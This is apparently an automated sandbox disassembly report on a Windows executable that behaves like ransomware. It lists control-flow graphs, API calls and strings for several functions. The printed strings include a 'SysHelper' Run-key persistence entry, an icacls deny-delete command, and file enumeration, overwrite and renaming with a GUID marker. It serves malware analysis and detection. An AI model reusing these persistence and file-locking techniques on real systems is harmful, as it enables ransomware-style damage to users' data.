                                                                                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                                                                                        • Opcode ID: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
                                                                                                                                                                                                                                        • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1997 40fb98-40fb9f 1998 40fba0-40fbb9 1997->1998 1998->1998 1999 40fbbb-40fbcf 1998->1999 2000 40fbd1 1999->2000 2001 40fbd3-40fc02 PathAppendW call 418400 1999->2001 2000->2001 2004 40fc04-40fc0c call 422587 2001->2004 2005 40fc0f-40fc29 2001->2005 2004->2005 2007 40fc49-40fc4c 2005->2007 2008 40fc2b-40fc2f 2005->2008 2009 40fc4f-40fc6b PathFileExistsW 2007->2009 2008->2009 2011 40fc31-40fc47 call 4205a0 2008->2011 2012 40fc6d-40fc86 call 420c62 2009->2012 2013 40fcdf-40fce5 2009->2013 2011->2009 2023 40fc88 2012->2023 2024 40fc8a-40fc9f lstrcpyW 2012->2024 2017 40fcf0-40fd07 call 417140 2013->2017 2018 40fce7-40fced call 422587 2013->2018 2026 40fd09 2017->2026 2027 40fd0b-40fd20 FindFirstFileW 2017->2027 2018->2017 2023->2024 2028 40fca1 2024->2028 2029 40fca3-40fcdc lstrcatW call 414690 call 40f0e0 call 420bed 2024->2029 2026->2027 2030 40fd30-40fd4c 2027->2030 2031 40fd22-40fd2d call 422587 2027->2031 2028->2029 2029->2013 2035 40fd52-40fd55 2030->2035 2036 410072-410076 2030->2036 2031->2030 2041 40fd60-40fd6b 2035->2041 2037 410086-4100a4 2036->2037 2038 410078-410083 call 422587 2036->2038 2043 4100b1-4100c9 2037->2043 2044 4100a6-4100ae call 422587 2037->2044 2038->2037 2046 40fd70-40fd76 2041->2046 2050 4100d6-4100ee 2043->2050 2051 4100cb-4100d3 call 422587 2043->2051 2044->2043 2052 40fd96-40fd98 2046->2052 2053 40fd78-40fd7b 2046->2053 2062 4100f0-4100f8 call 422587 2050->2062 2063 4100fb-41010b 2050->2063 2051->2050 2055 40fd9b-40fd9d 2052->2055 2059 40fd92-40fd94 2053->2059 2060 40fd7d-40fd85 2053->2060 2064 410052-410065 FindNextFileW 2055->2064 2065 40fda3-40fdae 2055->2065 2059->2055 2060->2052 2061 40fd87-40fd90 2060->2061 2061->2046 2061->2059 2062->2063 2064->2041 2068 41006b-41006c FindClose 2064->2068 2069 40fdb0-40fdb6 2065->2069 2068->2036 2071 40fdd6-40fdd8 2069->2071 2072 40fdb8-40fdbb 2069->2072 2075 40fddb-40fddd 2071->2075 2073 40fdd2-40fdd4 2072->2073 2074 40fdbd-40fdc5 2072->2074 2073->2075 2074->2071 2076 40fdc7-40fdd0 2074->2076 2075->2064 2077 40fde3-40fdea 2075->2077 2076->2069 2076->2073 2078 40fdf0-40fe71 call 417140 call 415ae0 call 414690 call 413b70 2077->2078 2079 40fec2-40fecc 2077->2079 2101 40fe81-40fea9 2078->2101 2102 40fe73-40fe7e call 422587 2078->2102 2081 40feda-40fede 2079->2081 2082 40fece-40fed5 call 411ab0 2079->2082 2081->2064 2083 40fee4-40ff13 call 414690 2081->2083 2082->2081 2091 40ff15-40ff17 2083->2091 2092 40ff19-40ff1f 2083->2092 2094 40ff31-40ff6a call 415ae0 PathFindExtensionW 2091->2094 2095 40ff22-40ff2b 2092->2095 2103 40ff9a-40ffa8 2094->2103 2104 40ff6c 2094->2104 2095->2095 2097 40ff2d-40ff2f 2095->2097 2097->2094 2101->2064 2108 40feaf-40febd call 422587 2101->2108 2102->2101 2106 40ffda-40ffde 2103->2106 2107 40ffaa 2103->2107 2109 40ff70-40ff74 2104->2109 2110 40ffe0-40ffe9 2106->2110 2111 41003a-410042 2106->2111 2113 40ffb0-40ffb4 2107->2113 2108->2064 2115 40ff76-40ff78 2109->2115 2116 40ff7a 2109->2116 2117 40ffeb 2110->2117 2118 40ffed-40fff9 call 421c02 2110->2118 2122 410044-41004c call 422587 2111->2122 2123 41004f 2111->2123 2119 40ffb6-40ffb8 2113->2119 2120 40ffba 2113->2120 2124 40ff7c-40ff88 call 421c02 2115->2124 2116->2124 2117->2118 2118->2111 2135 40fffb-41000b 2118->2135 2127 40ffbc-40ffce call 421c02 2119->2127 2120->2127 2122->2123 2123->2064 2133 40ff93 2124->2133 2134 40ff8a-40ff8f 2124->2134 2127->2111 2141 40ffd0-40ffd5 2127->2141 2138 40ff97 2133->2138 2134->2109 2137 40ff91 2134->2137 2139 41000d 2135->2139 2140 41000f-410026 call 421c02 2135->2140 2137->2138 2138->2103 2139->2140 2140->2111 2145 410028-410035 call 4111c0 2140->2145 2141->2113 2143 40ffd7 2141->2143 2143->2106 2145->2111
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                                                                                        • Opcode ID: b04923449a71f93d8f8f20cb0a5d7801164f9492eb4d19c1546c813baefe5a72
                                                                                                                                                                                                                                        • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b04923449a71f93d8f8f20cb0a5d7801164f9492eb4d19c1546c813baefe5a72
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 985 411cd0-411d1a call 42f7c0 RegOpenKeyExW 988 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 985->988 989 412207-412216 985->989 992 411d93-411d9c 988->992 993 411d8f-411d91 988->993 995 411da0-411da9 992->995 994 411daf-411dcb call 415c10 993->994 999 411dd1-411df8 lstrlenA call 413520 994->999 1000 411e7c-411e87 994->1000 995->995 996 411dab-411dad 995->996 996->994 1008 411e28-411e2c 999->1008 1009 411dfa-411dfe 999->1009 1002 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 411e89-411e91 call 422587 1000->1003 1012 411f36-411f38 1002->1012 1013 411f3a-411f3f 1002->1013 1003->1002 1010 411e3c-411e50 PathFileExistsW 1008->1010 1011 411e2e-411e39 call 422587 1008->1011 1014 411e00-411e08 call 422587 1009->1014 1015 411e0b-411e23 call 4145a0 1009->1015 1010->1000 1020 411e52-411e57 1010->1020 1011->1010 1018 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1012->1018 1019 411f40-411f49 1013->1019 1014->1015 1015->1008 1032 411f98-411fa0 1018->1032 1033 411fce-411fe9 1018->1033 1019->1019 1023 411f4b-411f4d 1019->1023 1024 411e59-411e5e 1020->1024 1025 411e6a-411e6e 1020->1025 1023->1018 1024->1025 1028 411e60-411e65 call 414690 1024->1028 1025->989 1030 411e74-411e77 1025->1030 1028->1025 1034 4121ff-412204 call 422587 1030->1034 1037 411fa2-411fa4 1032->1037 1038 411fa6-411faf 1032->1038 1035 411feb-411fed 1033->1035 1036 411fef-411ff8 1033->1036 1034->989 1040 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1035->1040 1041 412000-412009 1036->1041 1042 411fbf-411fc9 call 415c10 1037->1042 1044 411fb0-411fb9 1038->1044 1050 4121d1-4121d5 1040->1050 1051 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1051 1041->1041 1046 41200b-41200d 1041->1046 1042->1033 1044->1044 1048 411fbb-411fbd 1044->1048 1046->1040 1048->1042 1052 4121e2-4121fa 1050->1052 1053 4121d7-4121df call 422587 1050->1053 1059 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 412109-412110 call 413260 1051->1060 1052->989 1056 4121fc 1052->1056 1053->1052 1056->1034 1064 4121b2-4121b8 1059->1064 1065 4121aa-4121b0 GetLastError 1059->1065 1060->1059 1066 4121c0-4121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00412090
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00412120
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                                                                                        • Opcode ID: f980b6ffa76a6092ffbd2ad192a39922b734e241aa47311fe50dc2cde2940b2a
                                                                                                                                                                                                                                        • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f980b6ffa76a6092ffbd2ad192a39922b734e241aa47311fe50dc2cde2940b2a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004111C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1067 4111c0-41121d CreateFileW 1068 411223-411232 GetFileSizeEx 1067->1068 1069 4118eb-4118fb 1067->1069 1070 4112a3-4112be VirtualAlloc 1068->1070 1071 411234 1068->1071 1074 4112c0-4112d5 call 42b420 1070->1074 1075 41131a-411331 CloseHandle 1070->1075 1072 411236-41123a 1071->1072 1073 41123c-411281 CloseHandle call 413100 call 4159d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 411287-4112a2 call 422587 1073->1091 1081 4113b1 1074->1081 1082 4112db-4112de 1074->1082 1085 4113b7-4113ef SetFilePointer 1081->1085 1083 4112e0-4112e3 1082->1083 1084 4112e9-41130a SetFilePointerEx 1082->1084 1083->1081 1083->1084 1087 411332-41134d ReadFile 1084->1087 1088 41130c-411314 VirtualFree 1084->1088 1089 4113f5-41140d ReadFile 1085->1089 1090 4115bf 1085->1090 1087->1088 1092 41134f-411354 1087->1092 1088->1075 1093 411440-411445 1089->1093 1094 41140f-41143f VirtualFree CloseHandle call 412d50 1089->1094 1095 4115c5-4115d9 SetFilePointerEx 1090->1095 1092->1088 1097 411356-411359 1092->1097 1093->1090 1099 41144b-41146b 1093->1099 1095->1094 1100 4115df-4115eb 1095->1100 1097->1085 1102 41135b-411377 call 412c40 call 417060 1097->1102 1104 411471-4115a8 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40c5c0 call 412d10 call 412d50 call 40bbd0 call 40bd50 call 413ff0 call 412f70 call 40c070 SetFilePointer 1099->1104 1105 411718-4117d9 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40bbd0 call 40bd50 call 412f70 call 40c070 1099->1105 1106 4115ed-4115fc WriteFile 1100->1106 1107 41160e-411643 call 4130b0 call 412840 1100->1107 1130 4113a7-4113af call 412d50 1102->1130 1131 411379-4113a6 VirtualFree CloseHandle call 412d50 1102->1131 1182 4117e1-41182e call 412d50 call 412c40 call 412bf0 call 40cba0 1104->1182 1195 4115ae-4115ba call 412d50 * 2 1104->1195 1105->1182 1106->1094 1111 411602-41160b call 422110 1106->1111 1127 411645 1107->1127 1128 411647-41165a WriteFile call 412d50 1107->1128 1111->1107 1127->1128 1128->1094 1144 411660-411680 lstrlenA WriteFile 1128->1144 1130->1085 1144->1094 1147 411686-4116de CloseHandle call 413100 call 4159d0 MoveFileW 1144->1147 1163 4116e4-411717 VirtualFree call 413210 call 412d50 1147->1163 1164 4118a7-4118d3 call 413210 call 412d50 1147->1164 1184 4118e3-4118e6 1164->1184 1185 4118d5-4118dd VirtualFree 1164->1185 1203 411830-411832 1182->1203 1204 41186e-4118a6 VirtualFree CloseHandle call 412d50 * 2 1182->1204 1184->1069 1186 4118e8-4118e9 CloseHandle 1184->1186 1185->1184 1186->1069 1195->1090 1203->1204 1205 411834-41185b WriteFile 1203->1205 1205->1204 1207 41185d-411869 call 412d50 1205->1207 1207->1095
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004112C8
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004116D6
                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                                                        • API String ID: 254274740-1186676987
                                                                                                                                                                                                                                        • Opcode ID: 78eba2603e38d113a3cc7409a85c05b91dfbb622b821b3ba771994967f615fc3
                                                                                                                                                                                                                                        • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78eba2603e38d113a3cc7409a85c05b91dfbb622b821b3ba771994967f615fc3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1213 412220-41228a call 42f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 4122bd-4122d1 K32EnumProcesses 1213->1216 1217 41228c-4122ba LoadLibraryW GetProcAddress * 3 1213->1217 1218 4122d3-4122de 1216->1218 1219 4122df-4122ec 1216->1219 1217->1216 1220 412353-41235b 1219->1220 1221 4122ee 1219->1221 1222 4122f0-412308 OpenProcess 1221->1222 1223 412346-412351 CloseHandle 1222->1223 1224 41230a-41231a K32EnumProcessModules 1222->1224 1223->1220 1223->1222 1224->1223 1225 41231c-412339 K32GetModuleBaseNameW call 420235 1224->1225 1227 41233e-412343 1225->1227 1227->1223 1228 412345 1227->1228 1228->1223
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                                                                                        • Opcode ID: 45653c60598680e3d69244e1024ec46be28009d54c4cdfb4752acc6fb51945e7
                                                                                                                                                                                                                                        • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45653c60598680e3d69244e1024ec46be28009d54c4cdfb4752acc6fb51945e7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 0041F15E
                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 0041F185
                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 0041F19D
                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                                                                                                                                                                                                                                          • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                                                          • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
